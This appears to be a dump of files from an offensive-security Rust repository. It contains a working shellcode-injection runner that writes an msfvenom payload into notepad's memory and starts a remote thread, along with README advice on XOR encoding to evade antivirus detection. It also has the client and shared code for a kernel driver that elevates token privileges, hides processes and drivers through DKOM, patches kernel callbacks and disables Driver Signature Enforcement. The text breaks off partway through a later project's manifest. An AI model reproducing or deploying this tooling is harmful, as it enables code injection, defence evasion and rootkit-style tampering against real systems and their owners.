-------------------------------------------------------------------------------- 1 | # Classic Shellcode Runner in Rust 2 | 3 | Classic Shellcode in Rust using NTDLL functions directly with the NTAPI library. 4 | 5 | 6 | ## Encoding (XOR) 7 | 8 | The shellcode used is a msfvenom payload that is simply XOR encoded: 9 | 10 | The shellcode is then decoded in the program at runtime using the following: 11 | ```rust 12 | let mut shellcode : Vec = Vec::with_capacity(buf.len()); 13 | for x in &buf { 14 | shellcode.push(*x ^ 0xBE); //change this byte for different XOR. 15 | } 16 | ``` 17 | 18 | Comment out the appropriate line if you don't want to use any encoding and if you do then make sure you encode your shellcode with the appropriate byte. 19 | 20 | ## Detections 21 | 22 | I had 0 detections on Virus Total but this will change after making the project public, also don't rely 100% on virus total results. 23 | 24 | ![Detections](./Detections.PNG) 25 | 26 | https://www.virustotal.com/gui/file/34d2ad3a0c5d603df03ddca8cdaff47545ab427aa9c32dd60e15764b3615abab?nocache=1 27 | 28 | 29 | ## References and Credits 30 | 31 | * https://mr.un1k0d3r.com/ (Including the people in the VIP discord Mr.Un1k0d3r, Waldo-IRC, Ditto, nixfreax) 32 | * https://discord.com/invite/rust-lang-community (Rust Lang Community) 33 | * https://github.com/trickster0/OffensiveRust (Motivated by this repository) 34 | * https://github.com/byt3bl33d3r/OffensiveNim 35 | * https://twitter.com/_RastaMouse and https://twitter.com/Jean_Maes_1994 36 | * https://docs.rs/winapi/0.3.9/winapi/ 37 | * https://www.rust-lang.org/learn 38 | -------------------------------------------------------------------------------- /memN0ps/arsenal-rs/shellcode_runner_classic-rs/src/main.rs: -------------------------------------------------------------------------------- 1 | //use libaes::Cipher; 2 | use sysinfo::{Pid, ProcessExt, SystemExt}; 3 | 4 | use std::{ 5 | default::Default, 6 | ffi::c_void, 7 | ptr::null_mut, 8 | }; 9 | 10 | use ntapi::{ 11 | ntpsapi::{NtOpenProcess, NtCreateThreadEx}, 12 | ntmmapi::{NtAllocateVirtualMemory, NtWriteVirtualMemory}, 13 | ntapi_base::{CLIENT_ID} 14 | }; 15 | 16 | use winapi::{ 17 | um::{ 18 | winnt::{MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_RESERVE, MAXIMUM_ALLOWED}, 19 | lmaccess::{ACCESS_ALL} 20 | }, 21 | shared::{ 22 | ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS} 23 | } 24 | }; 25 | 26 | fn main() { 27 | let process_id = get_process_id_by_name("notepad"); 28 | 29 | println!("process ID: {}", process_id); 30 | 31 | inject_shellcode(process_id); 32 | } 33 | 34 | fn inject_shellcode(process_id: Pid) { 35 | 36 | unsafe { 37 | let mut oa = OBJECT_ATTRIBUTES::default(); 38 | 39 | let mut process_handle = process_id as HANDLE; 40 | 41 | let mut ci = CLIENT_ID { 42 | UniqueProcess: process_handle, 43 | UniqueThread: null_mut(), 44 | }; 45 | 46 | 47 | let mut status = NtOpenProcess(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci); 48 | 49 | if !NT_SUCCESS(status) { 50 | panic!("Error opening process: {}", status); 51 | } 52 | 53 | // 54 | //xor encrypted shellcode goes here. 55 | // 56 | 57 | //let xor_shellcode: Vec = vec![0x90, 0x90, 0x90]; 58 | //let mut shellcode: Vec = xor_decode(&encoded_shellcode, 0xDA); 59 | 60 | // 61 | //aes encrypted shellcode goes here 62 | // 63 | 64 | //let aes_shellcode: Vec = vec![0x90, 0x90, 0x90]; 65 | //let mut shellcode: Vec = aes_256_decrypt(&aes_shellcode, b"ABCDEFGHIJKLMNOPQRSTUVWXYZ-01337", b"This is 16 bytes"); 66 | 67 | // 68 | //default shellcode goes here 69 | // 70 | 71 | //msfvenom -p windows/x64/exec CMD="calc.exe" -f rust 72 | let mut buf: [u8; 276] = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0, 73 | 0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31, 74 | 0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b, 75 | 0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d, 76 | 0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20, 77 | 0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51, 78 | 0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80, 79 | 0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0, 80 | 0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3, 81 | 0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d, 82 | 0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01, 83 | 0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39, 84 | 0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66, 85 | 0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41, 86 | 0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59, 87 | 0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41, 88 | 0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57, 89 | 0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00, 90 | 0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31, 91 | 0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba, 92 | 0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06, 93 | 0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f, 94 | 0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63, 95 | 0x2e,0x65,0x78,0x65,0x00]; 96 | 97 | 98 | let mut shellcode_length = buf.len(); 99 | 100 | let handle = process_handle as *mut c_void; 101 | let mut base_address : *mut c_void = null_mut(); 102 | status = NtAllocateVirtualMemory(handle, &mut base_address, 0, &mut shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 103 | 104 | 105 | if !NT_SUCCESS(status) { 106 | panic!("Error allocating memory to the target process: {}", status); 107 | } 108 | 109 | let mut bytes_written = 0; 110 | 111 | let buffer = buf.as_mut_ptr() as *mut c_void; 112 | let buffer_length = buf.len(); 113 | 114 | status = NtWriteVirtualMemory(handle, base_address, buffer, buffer_length, &mut bytes_written); 115 | 116 | if !NT_SUCCESS(status) { 117 | panic!("Error writing shellcode to memory of the target process: {}", status); 118 | } 119 | 120 | let mut thread_handle : *mut c_void = null_mut(); 121 | 122 | status = NtCreateThreadEx(&mut thread_handle, MAXIMUM_ALLOWED, null_mut(), handle, base_address, null_mut(), 0, 0, 0, 0, null_mut()); 123 | 124 | if !NT_SUCCESS(status) { 125 | panic!("Error failed to create remote thread: {}", status); 126 | } 127 | } 128 | } 129 | 130 | fn get_process_id_by_name(target_process: &str) -> Pid { 131 | let mut system = sysinfo::System::new(); 132 | system.refresh_all(); 133 | 134 | let mut process_id = 0; 135 | 136 | for process in system.process_by_name(target_process) { 137 | process_id = process.pid(); 138 | } 139 | 140 | return process_id; 141 | } 142 | 143 | /* 144 | fn xor_decode(shellcode: &Vec, key: u8) -> Vec { 145 | shellcode.iter().map(|x| x ^ key).collect() 146 | } 147 | */ 148 | 149 | /* 150 | fn aes_256_decrypt(shellcode: &Vec, key: &[u8; 32], iv: &[u8; 16]) -> Vec { 151 | // Create a new 128-bit cipher 152 | let cipher = Cipher::new_256(key); 153 | 154 | //Decryption 155 | let decrypted = cipher.cbc_decrypt(iv, &shellcode); 156 | 157 | decrypted 158 | } 159 | */ 160 | 161 | /* 162 | fn get_input() -> io::Result<()> { 163 | let mut buf = String::new(); 164 | std::io::stdin().read_line(&mut buf)?; 165 | Ok(()) 166 | } 167 | 168 | /// Used for debugging 169 | fn pause() { 170 | match get_input() { 171 | Ok(buffer) => println!("{:?}", buffer), 172 | Err(error) => println!("error: {}", error), 173 | }; 174 | }*/ -------------------------------------------------------------------------------- /memN0ps/eagle-rs/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | Cargo.lock 3 | *.cer -------------------------------------------------------------------------------- /memN0ps/eagle-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [workspace] 2 | 3 | members = [ 4 | "client", 5 | "driver", 6 | "common", 7 | ] 8 | 9 | [profile.release] 10 | opt-level = 3 -------------------------------------------------------------------------------- /memN0ps/eagle-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/eagle-rs/client/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "client" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = { version = "0.3.7", features = ["processthreadsapi", "memoryapi", "winbase", "impl-default", "errhandlingapi", "fileapi", "winioctl"] } 10 | sysinfo = "0.20.4" 11 | clap = { version = "3.1.6", features = ["derive"] } 12 | common = { path = "../common" } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/client/src/main.rs: -------------------------------------------------------------------------------- 1 | use sysinfo::{Pid, SystemExt, ProcessExt}; 2 | use winapi::um::{fileapi::{CreateFileA, OPEN_EXISTING}, winnt::{GENERIC_READ, GENERIC_WRITE, FILE_SHARE_READ, FILE_SHARE_WRITE}, handleapi::CloseHandle}; 3 | use std::{ffi::CString, ptr::null_mut}; 4 | mod kernel_interface; 5 | use clap::{Args, Parser, Subcommand, ArgGroup}; 6 | 7 | #[derive(Parser)] 8 | #[clap(author, version, about, long_about = None)] 9 | struct Cli { 10 | #[clap(subcommand)] 11 | command: Commands, 12 | } 13 | 14 | #[derive(Subcommand)] 15 | enum Commands { 16 | Process(Process), 17 | Callbacks(Callbacks), 18 | DSE(DSE), 19 | Driver(Driver), 20 | } 21 | 22 | #[derive(Args)] 23 | #[clap(group( 24 | ArgGroup::new("process") 25 | .required(true) 26 | .args(&["protect", "unprotect", "elevate", "hide"]), 27 | ))] 28 | struct Process { 29 | /// Target process name 30 | #[clap(long, short, value_name = "PROCESS")] 31 | name: String, 32 | 33 | /// Protect a process 34 | #[clap(long, short)] 35 | protect: bool, 36 | 37 | /// Unprotect a process 38 | #[clap(long, short)] 39 | unprotect: bool, 40 | 41 | /// Elevate all token privileges 42 | #[clap(long, short)] 43 | elevate: bool, 44 | 45 | /// Hide a process using Direct Kernel Object Manipulation (DKOM) 46 | #[clap(long)] 47 | hide: bool, 48 | } 49 | 50 | #[derive(Args)] 51 | #[clap(group( 52 | ArgGroup::new("callbacks") 53 | .required(true) 54 | .args(&["enumerate", "patch"]), 55 | ))] 56 | struct Callbacks { 57 | /// Enumerate kernel callbacks 58 | #[clap(long, short)] 59 | enumerate: bool, 60 | 61 | /// Patch kernel callbacks 0-63 62 | #[clap(long, short)] 63 | patch: Option, 64 | } 65 | 66 | #[derive(Args)] 67 | #[clap(group( 68 | ArgGroup::new("dse") 69 | .required(true) 70 | .args(&["enable", "disable"]), 71 | ))] 72 | struct DSE { 73 | /// Enable Driver Signature Enforcement (DSE) 74 | #[clap(long, short)] 75 | enable: bool, 76 | 77 | /// Disable Driver Signature Enforcement (DSE) 78 | #[clap(long, short)] 79 | disable: bool, 80 | } 81 | 82 | #[derive(Args)] 83 | #[clap(group( 84 | ArgGroup::new("driver") 85 | .required(true) 86 | .args(&["hide", "enumerate"]), 87 | ))] 88 | struct Driver { 89 | /// Hide a driver using Direct Kernel Object Manipulation (DKOM) 90 | #[clap(long)] 91 | hide: bool, 92 | 93 | /// Enumerate loaded kernel modules 94 | #[clap(long, short)] 95 | enumerate: bool, 96 | } 97 | 98 | fn main() { 99 | 100 | let cli = Cli::parse(); 101 | 102 | let file = CString::new("\\\\.\\Eagle").unwrap().into_raw() as *const i8; 103 | let driver_handle = unsafe { 104 | CreateFileA( 105 | file, 106 | GENERIC_READ | GENERIC_WRITE, 107 | FILE_SHARE_READ | FILE_SHARE_WRITE, 108 | null_mut(), 109 | OPEN_EXISTING, 110 | 0, 111 | null_mut()) 112 | }; 113 | 114 | if driver_handle.is_null() { 115 | panic!("[-] Failed to get a handle to the driver"); 116 | } 117 | 118 | match &cli.command { 119 | Commands::Process(p) => { 120 | let process_id = get_process_id_by_name(p.name.as_str()) as u32; 121 | 122 | if p.protect { 123 | kernel_interface::protect_process(process_id, driver_handle); 124 | } else if p.unprotect { 125 | kernel_interface::unprotect_process(process_id, driver_handle); 126 | } else if p.elevate { 127 | kernel_interface::enable_tokens(process_id, driver_handle); 128 | } else if p.hide { 129 | kernel_interface::hide_process(process_id, driver_handle); 130 | } else { 131 | println!("[-] Invalid arguments"); 132 | } 133 | } 134 | Commands::Callbacks(c) => { 135 | if c.enumerate { 136 | kernel_interface::enumerate_callbacks(driver_handle); 137 | } else if c.patch.unwrap() > 0 && c.patch.unwrap() < 64 { 138 | kernel_interface::patch_callback(c.patch.unwrap(), driver_handle); 139 | } else { 140 | println!("[-] Invalid arguments"); 141 | } 142 | } 143 | Commands::DSE(d) => { 144 | if d.enable { 145 | kernel_interface::enable_or_disable_dse(driver_handle, true); 146 | } else if d.disable { 147 | kernel_interface::enable_or_disable_dse(driver_handle, false); 148 | } else { 149 | println!("[-] Invalid arguments"); 150 | } 151 | } 152 | Commands::Driver(d) => { 153 | if d.hide { 154 | kernel_interface::hide_driver(driver_handle); 155 | } else if d.enumerate { 156 | kernel_interface::get_loaded_modules_list(driver_handle); 157 | } else { 158 | println!("[-] Invalid arguments"); 159 | } 160 | } 161 | } 162 | 163 | unsafe { CloseHandle(driver_handle) }; 164 | } 165 | 166 | /// Get process ID by name 167 | fn get_process_id_by_name(target_process: &str) -> Pid { 168 | let mut system = sysinfo::System::new(); 169 | system.refresh_all(); 170 | 171 | let mut process_id = 0; 172 | 173 | for process in system.process_by_name(target_process) { 174 | process_id = process.pid(); 175 | } 176 | 177 | return process_id; 178 | } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/cmd_hide1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/eagle-rs/cmd_hide1.png -------------------------------------------------------------------------------- /memN0ps/eagle-rs/cmd_hide2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/eagle-rs/cmd_hide2.png -------------------------------------------------------------------------------- /memN0ps/eagle-rs/common/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "common" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = { version = "0.3.9", features = ["processthreadsapi", "memoryapi", "winbase", "impl-default", "errhandlingapi", "fileapi", "winioctl"] } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/common/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![no_std] 2 | 3 | extern crate alloc; 4 | use winapi::{um::winioctl::{FILE_DEVICE_UNKNOWN, METHOD_NEITHER, FILE_ANY_ACCESS}}; 5 | 6 | macro_rules! CTL_CODE { 7 | ($DeviceType:expr, $Function:expr, $Method:expr, $Access:expr) => { 8 | ($DeviceType << 16) | ($Access << 14) | ($Function << 2) | $Method 9 | } 10 | } 11 | 12 | pub const IOCTL_PROCESS_READ_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS); 13 | pub const IOCTL_PROCESS_WRITE_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS); 14 | pub const IOCTL_PROCESS_PROTECT_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS); 15 | pub const IOCTL_PROCESS_UNPROTECT_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x803, METHOD_NEITHER, FILE_ANY_ACCESS); 16 | pub const IOCTL_PROCESS_TOKEN_PRIVILEGES_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS); 17 | pub const IOCTL_PROCESS_HIDE_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_ANY_ACCESS); 18 | 19 | pub const IOCTL_CALLBACKS_ENUM_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_ANY_ACCESS); 20 | pub const IOCTL_CALLBACKS_ZERO_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_ANY_ACCESS); 21 | 22 | pub const IOCTL_DSE_ENABLE_DISABLE_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x808, METHOD_NEITHER, FILE_ANY_ACCESS); 23 | 24 | pub const IOCTL_DRIVER_HIDE_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x809, METHOD_NEITHER, FILE_ANY_ACCESS); 25 | pub const IOCTL_DRIVER_ENUM_REQUEST: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x810, METHOD_NEITHER, FILE_ANY_ACCESS); 26 | 27 | 28 | #[repr(C)] 29 | #[derive(Debug, Clone, Copy)] 30 | pub struct TargetProcess { 31 | pub process_id: u32, 32 | } 33 | 34 | #[repr(C)] 35 | #[derive(Debug, Clone, Copy)] 36 | pub struct CallBackInformation { 37 | pub module_name: [u8; 256], 38 | pub pointer: u64, 39 | } 40 | 41 | /* 42 | impl Default for CallBackInformation { 43 | fn default() -> Self { 44 | Self { 45 | module_name: [0u8; 256], 46 | pointer: 0, 47 | } 48 | } 49 | }*/ 50 | 51 | pub struct TargetCallback { 52 | pub index: u32 53 | } 54 | 55 | pub struct DriverSignatureEnforcement { 56 | pub address: u64, 57 | pub is_enabled: bool, 58 | } 59 | 60 | #[derive(Debug, Clone)] 61 | pub struct ModuleInformation { 62 | pub module_base: usize, 63 | pub module_name: [u16; 256], 64 | } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/driver/.cargo/config.toml: -------------------------------------------------------------------------------- 1 | [build] 2 | target = "x86_64-pc-windows-msvc" 3 | 4 | rustflags = [ 5 | "-C", "panic=abort", 6 | 7 | # Pre Link Args 8 | "-Z", "pre-link-arg=/NOLOGO", 9 | "-Z", "pre-link-arg=/NXCOMPAT", 10 | "-Z", "pre-link-arg=/NODEFAULTLIB", 11 | "-Z", "pre-link-arg=/SUBSYSTEM:NATIVE", 12 | "-Z", "pre-link-arg=/DRIVER", 13 | "-Z", "pre-link-arg=/DYNAMICBASE", 14 | "-Z", "pre-link-arg=/MANIFEST:NO", 15 | "-Z", "pre-link-arg=/PDBALTPATH:none", 16 | 17 | # Post Link Args 18 | "-C", "link-arg=/OPT:REF,ICF", 19 | "-C", "link-arg=/ENTRY:driver_entry", 20 | "-C", "link-arg=/MERGE:.edata=.rdata", 21 | "-C", "link-arg=/MERGE:.rustc=.data", 22 | "-C", "link-arg=/INTEGRITYCHECK" 23 | ] -------------------------------------------------------------------------------- /memN0ps/eagle-rs/driver/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "driver" 3 | version = "0.1.0" 4 | edition = "2021" 5 | build = "build.rs" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [lib] 10 | path = "src/lib.rs" 11 | crate-type = ["cdylib"] 12 | 13 | [profile.dev] 14 | panic = "abort" 15 | 16 | [profile.release] 17 | panic = "abort" 18 | 19 | [dependencies] 20 | ntapi = { version = "0.3.7", default-features = false} 21 | log = "0.4.16" 22 | bstr = { version = "0.2.17", default-features = false} 23 | kernel-log = "0.1.1" 24 | kernel-print = "0.1.0" 25 | kernel-alloc = "0.1.0" 26 | obfstr = "0.3.0" 27 | modular-bitfield = "0.11.2" 28 | common = { path = "../common" } 29 | 30 | [dependencies.winapi] 31 | git = "https://github.com/Trantect/winapi-rs.git" 32 | branch = "feature/km" 33 | features = [ 34 | "wdm", 35 | "ntstatus", 36 | ] 37 | 38 | [build-dependencies] 39 | winreg = "0.10.1" 40 | failure = "0.1.8" -------------------------------------------------------------------------------- /memN0ps/eagle-rs/driver/Makefile.toml: -------------------------------------------------------------------------------- 1 | [env.development] 2 | TARGET_PATH = "../target/x86_64-pc-windows-msvc/debug" 3 | 4 | [env.production] 5 | TARGET_PATH = "../target/x86_64-pc-windows-msvc/release" 6 | BUILD_FLAGS = "--release" 7 | 8 | [tasks.build-driver] 9 | script = [ 10 | "cargo b %BUILD_FLAGS%" 11 | ] 12 | 13 | [tasks.rename] 14 | dependencies = ["build-driver"] 15 | ignore_errors = true 16 | script = [ 17 | "cd %TARGET_PATH%", 18 | "rename driver.dll Eagle.sys", 19 | ] 20 | 21 | [tasks.sign] 22 | dependencies = ["build-driver", "rename"] 23 | script = [ 24 | # Load the Visual Studio Developer environment 25 | "call \"%ProgramFiles(x86)%\\Microsoft Visual Studio\\2019\\Community\\VC\\Auxiliary\\Build\\vcvars64.bat\"", 26 | 27 | # Create a self signed certificate (only if not already done) 28 | "if not exist DriverCertificate.cer ( makecert -r -pe -ss PrivateCertStore -n CN=DriverCertificate DriverCertificate.cer ) else ( echo Certificate already exists. )", 29 | 30 | # Sign the driver 31 | "signtool sign /a /v /s PrivateCertStore /n DriverCertificate /fd certHash /t http://timestamp.digicert.com %TARGET_PATH%/Eagle.sys" 32 | ] -------------------------------------------------------------------------------- /memN0ps/eagle-rs/driver/build.rs: -------------------------------------------------------------------------------- 1 | use failure::{format_err, Error}; 2 | use std::{ 3 | env::var, 4 | path::{Path, PathBuf}, 5 | }; 6 | use winreg::{enums::*, RegKey}; 7 | 8 | /// Returns the path to the `Windows Kits` directory. It's by default at 9 | /// `C:\Program Files (x86)\Windows Kits\10`. 10 | fn get_windows_kits_dir() -> Result { 11 | let hklm = RegKey::predef(HKEY_LOCAL_MACHINE); 12 | let key = r"SOFTWARE\Microsoft\Windows Kits\Installed Roots"; 13 | let dir: String = hklm.open_subkey(key)?.get_value("KitsRoot10")?; 14 | 15 | Ok(dir.into()) 16 | } 17 | 18 | /// Returns the path to the kernel mode libraries. The path may look like this: 19 | /// `C:\Program Files (x86)\Windows Kits\10\lib\10.0.18362.0\km`. 20 | fn get_km_dir(windows_kits_dir: &PathBuf) -> Result { 21 | let readdir = Path::new(windows_kits_dir).join("lib").read_dir()?; 22 | 23 | let max_libdir = readdir 24 | .filter_map(|dir| dir.ok()) 25 | .map(|dir| dir.path()) 26 | .filter(|dir| { 27 | dir.components() 28 | .last() 29 | .and_then(|c| c.as_os_str().to_str()) 30 | .map(|c| c.starts_with("10.") && dir.join("km").is_dir()) 31 | .unwrap_or(false) 32 | }) 33 | .max() 34 | .ok_or_else(|| format_err!("Can not find a valid km dir in `{:?}`", windows_kits_dir))?; 35 | 36 | Ok(max_libdir.join("km")) 37 | } 38 | 39 | fn internal_link_search() { 40 | let windows_kits_dir = get_windows_kits_dir().unwrap(); 41 | let km_dir = get_km_dir(&windows_kits_dir).unwrap(); 42 | let target = var("TARGET").unwrap(); 43 | 44 | let arch = if target.contains("x86_64") { 45 | "x64" 46 | } else if target.contains("i686") { 47 | "x86" 48 | } else { 49 | panic!("Only support x86_64 and i686!"); 50 | }; 51 | 52 | let lib_dir = km_dir.join(arch); 53 | println!("cargo:rustc-link-search=native={}", lib_dir.to_str().unwrap()); 54 | println!("cargo:rustc-link-lib=msvcrt"); 55 | } 56 | 57 | fn extra_link_search() {} 58 | 59 | fn main() { 60 | if var(format!("CARGO_FEATURE_{}", "extra_link_search".to_uppercase())).is_ok() { 61 | extra_link_search() 62 | } else { 63 | internal_link_search() 64 | } 65 | } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/driver/src/process/memory.rs: -------------------------------------------------------------------------------- 1 | use winapi::{km::wdm::PEPROCESS, shared::ntdef::NT_SUCCESS, um::winnt::PACCESS_TOKEN}; 2 | 3 | use crate::includes::{PsLookupProcessByProcessId, ObfDereferenceObject, PsReferencePrimaryToken, PsDereferencePrimaryToken}; 4 | 5 | #[derive(Debug, Clone)] 6 | pub struct Process { 7 | pub eprocess: PEPROCESS, 8 | } 9 | 10 | impl Process { 11 | pub fn by_id(process_id: u64) -> Option { 12 | let mut process = core::ptr::null_mut(); 13 | 14 | let status = unsafe { PsLookupProcessByProcessId(process_id as _, &mut process) }; 15 | if NT_SUCCESS(status) { 16 | Some(Self { eprocess: process }) 17 | } else { 18 | None 19 | } 20 | } 21 | } 22 | 23 | impl Drop for Process { 24 | fn drop(&mut self) { 25 | if !self.eprocess.is_null() { 26 | unsafe { ObfDereferenceObject(self.eprocess as _) } 27 | } 28 | } 29 | } 30 | 31 | #[derive(Debug, Clone)] 32 | pub struct Token { 33 | pub token: PACCESS_TOKEN, 34 | } 35 | 36 | impl Token { 37 | pub fn by_token(eprocess: PEPROCESS) -> Option { 38 | 39 | let token = unsafe { PsReferencePrimaryToken(eprocess) }; 40 | if !token.is_null() { 41 | Some(Self { token }) 42 | } else { 43 | None 44 | } 45 | } 46 | } 47 | 48 | impl Drop for Token { 49 | fn drop(&mut self) { 50 | if !self.token.is_null() { 51 | unsafe { PsDereferencePrimaryToken(self.token) } 52 | } 53 | } 54 | } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/driver/src/string/mod.rs: -------------------------------------------------------------------------------- 1 | use winapi::shared::ntdef::UNICODE_STRING; 2 | 3 | pub fn create_unicode_string(s: &[u16]) -> UNICODE_STRING { 4 | let len = s.len(); 5 | 6 | let n = if len > 0 && s[len - 1] == 0 { len - 1 } else { len }; 7 | 8 | UNICODE_STRING { 9 | Length: (n * 2) as u16, 10 | MaximumLength: (len * 2) as u16, 11 | Buffer: s.as_ptr() as _, 12 | } 13 | } -------------------------------------------------------------------------------- /memN0ps/eagle-rs/notepad_protect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/eagle-rs/notepad_protect.png -------------------------------------------------------------------------------- /memN0ps/eagle-rs/notepad_unprotect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/eagle-rs/notepad_unprotect.png -------------------------------------------------------------------------------- /memN0ps/ekko-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | -------------------------------------------------------------------------------- /memN0ps/ekko-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "ekko-rs" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [profile.release] 8 | opt-level = "z" # Optimize for size. 9 | lto = true # Enable Link Time Optimization 10 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 11 | panic = "abort" # Abort on panic 12 | strip = true # Automatically strip symbols from the binary. 13 | 14 | [dependencies] 15 | 16 | [dependencies.windows-sys] 17 | version = "0.45.0" 18 | features = [ 19 | "Win32_Foundation", 20 | "Win32_Security", 21 | "Win32_System_Threading", 22 | "Win32_UI_WindowsAndMessaging", 23 | "Win32_System_Memory", 24 | "Win32_System_Diagnostics_Debug", 25 | "Win32_System_SystemServices", 26 | "Win32_System_WindowsProgramming", 27 | "Win32_System_LibraryLoader", 28 | 